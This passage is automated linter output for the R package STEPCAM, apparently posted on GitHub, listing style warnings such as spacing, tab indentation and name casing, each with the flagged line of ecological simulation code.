^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:246:32:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L246) *style:* **Put spaces around all infix operators.**\n```r\n​        numberAccepted / (tried-1), \"\\n\")\n                              ~^~\n```\n[R/ABC_SMC.R:249:27:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L249) *style:* **Commas should always have a space after.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^\n```\n[R/ABC_SMC.R:249:27:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L249) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:250:20:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L250) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_disp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:251:20:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L251) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_filt <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:252:20:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L252) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_comp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:262:61:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L262) *style:* **Put spaces around all infix operators.**\n```r\n​    d <- read.table(paste(\"particles_t=\", t - 1, \".txt\", sep=\"\",\n                                                           ~^~\n```\n[R/ABC_SMC.R:266:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L266) *style:* **lines should not be more than 80 characters.**\n```r\n​           \"Can't stop at iteration 1 - please set stop_at_iteration to 2 if you only want to generate from the prior\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:4:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L4) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​generate.Artificial.Data <- function(n_species, n_traits, n_communities,\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:6:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tpool_richness <- n_species\n^\n```\n[R/generateArtificialData.R:8:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n^\n```\n[R/generateArtificialData.R:9:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n^\n```\n[R/generateArtificialData.R:9:23:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L9) *style:* **Put spaces around all infix operators.**\n```r\n​\tpool_richness <- n_species\n                     ~^~~\n```\n[R/generateArtificialData.R:10:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n^\n```\n[R/generateArtificialData.R:11:21:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                   ~^~~\n```\n[R/generateArtificialData.R:11:47:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                             ~^~\n```\n[R/generateArtificialData.R:11:49:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L11) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                ^\n```\n[R/generateArtificialData.R:11:64:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                              ~^~\n```\n[R/generateArtificialData.R:12:50:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                ~^~\n```\n[R/generateArtificialData.R:12:58:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                        ~^~\n```\n[R/generateArtificialData.R:13:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:pool_richness) {\n^\n```\n[R/generateArtificialData.R:13:37:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                   ~^~\n```\n[R/generateArtificialData.R:13:54:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                                    ~^~\n```\n[R/generateArtificialData.R:14:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n^\n```\n[R/generateArtificialData.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:16:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:16:12:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L16) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:pool_richness) {\n           ^\n```\n[R/generateArtificialData.R:17:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n^\n```\n[R/generateArtificialData.R:17:22:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L17) *style:* **Put spaces around all infix operators.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n                    ~^~~\n```\n[R/generateArtificialData.R:18:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n^\n```\n[R/generateArtificialData.R:19:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:19:14:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L19) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n            ~^~~\n```\n[R/generateArtificialData.R:19:25:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L19) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n                        ^\n```\n[R/generateArtificialData.R:20:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1[1] <- \"species\"\n^\n```\n[R/generateArtificialData.R:20:12:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L20) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n           ^\n```\n[R/generateArtificialData.R:21:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:21:19:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                 ~^~~\n```\n[R/generateArtificialData.R:21:37:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L21) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                    ^\n```\n[R/generateArtificialData.R:21:40:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                      ~^~\n```\n[R/generateArtificialData.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n^\n```\n[R/generateArtificialData.R:23:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(traits_pool_df) <- row1\n^\n```\n[R/generateArtificialData.R:23:17:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1[1] <- \"species\"\n               ~^~~\n```\n[R/generateArtificialData.R:24:17:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n               ~^~~\n```\n[R/generateArtificialData.R:24:61:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                           ~^~\n```\n[R/generateArtificialData.R:24:63:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L24) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                              ^\n```\n[R/generateArtificialData.R:25:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n^\n```\n[R/generateArtificialData.R:25:24:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n                      ~^~~\n```\n[R/generateArtificialData.R:26:31:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L26) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(traits_pool_df) <- row1\n                             ~^~~\n```\n[R/generateArtificialData.R:28:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n^\n```\n[R/generateArtificialData.R:28:26:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                        ~^~~\n```\n[R/generateArtificialData.R:28:43:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L28) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                          ^\n```\n[R/generateArtificialData.R:28:58:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                                        ~^~\n```\n[R/generateArtificialData.R:30:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^\n```\n[R/generateArtificialData.R:31:19:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                 ~^~~\n```\n[R/generateArtificialData.R:31:24:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                      ~^~\n```\n[R/generateArtificialData.R:31:51:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                 ~^~\n```\n[R/generateArtificialData.R:31:59:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                         ~^~\n```\n[R/generateArtificialData.R:32:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L32) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L33) *style:* **lines should not be more than 80 characters.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:33:25:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                       ~^~~\n```\n[R/generateArtificialData.R:33:34:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                 ^\n```\n[R/generateArtificialData.R:33:61:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                           ~^~\n```\n[R/generateArtificialData.R:33:69:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                    ^~\n```\n[R/generateArtificialData.R:33:74:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                        ~^~\n```\n[R/generateArtificialData.R:33:76:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                           ^\n```\n[R/generateArtificialData.R:33:89:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                                       ~^~\n```\n[R/generateArtificialData.R:34:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_communities){\n^\n```\n[R/generateArtificialData.R:35:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  if(mechanism_random == T){\n^\n```\n[R/generateArtificialData.R:35:47:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                             ~^~\n```\n[R/generateArtificialData.R:35:65:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                                               ~^~~\n```\n[R/generateArtificialData.R:36:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L36) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:36:47:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n                                             ~^\n```\n[R/generateArtificialData.R:37:12:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L37) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_communities){\n           ^\n```\n[R/generateArtificialData.R:38:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }else{\n^\n```\n[R/generateArtificialData.R:38:13:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L38) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  if(mechanism_random == T){\n            ^\n```\n[R/generateArtificialData.R:39:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n^\n```\n[R/generateArtificialData.R:39:29:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L39) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:40:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L40) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- c()\n^\n```\n[R/generateArtificialData.R:41:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(j in 1:n_traits){\n^\n```\n[R/generateArtificialData.R:42:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L42) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      for(k in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:42:24:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                      ~^~~\n```\n[R/generateArtificialData.R:42:48:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                                              ~^~\n```\n[R/generateArtificialData.R:43:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L43) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n^~\n```\n[R/generateArtificialData.R:44:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n^~\n```\n[R/generateArtificialData.R:44:16:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L44) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(j in 1:n_traits){\n               ^\n```\n[R/generateArtificialData.R:45:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      }\n^\n```\n[R/generateArtificialData.R:45:18:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L45) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t      for(k in 1:pool_richness){\n                 ^\n```\n[R/generateArtificialData.R:46:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:46:25:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                       ~^~~\n```\n[R/generateArtificialData.R:46:28:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                           ^\n```\n[R/generateArtificialData.R:46:31:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                             ~^~\n```\n[R/generateArtificialData.R:46:36:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                                  ~^\n```\n[R/generateArtificialData.R:47:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n^\n```\n[R/generateArtificialData.R:47:44:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n                                          ~^~~\n```\n[R/generateArtificialData.R:48:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n^\n```\n[R/generateArtificialData.R:49:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    trait_distances_onedimen <- c()\n^\n```\n[R/generateArtificialData.R:50:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(m in 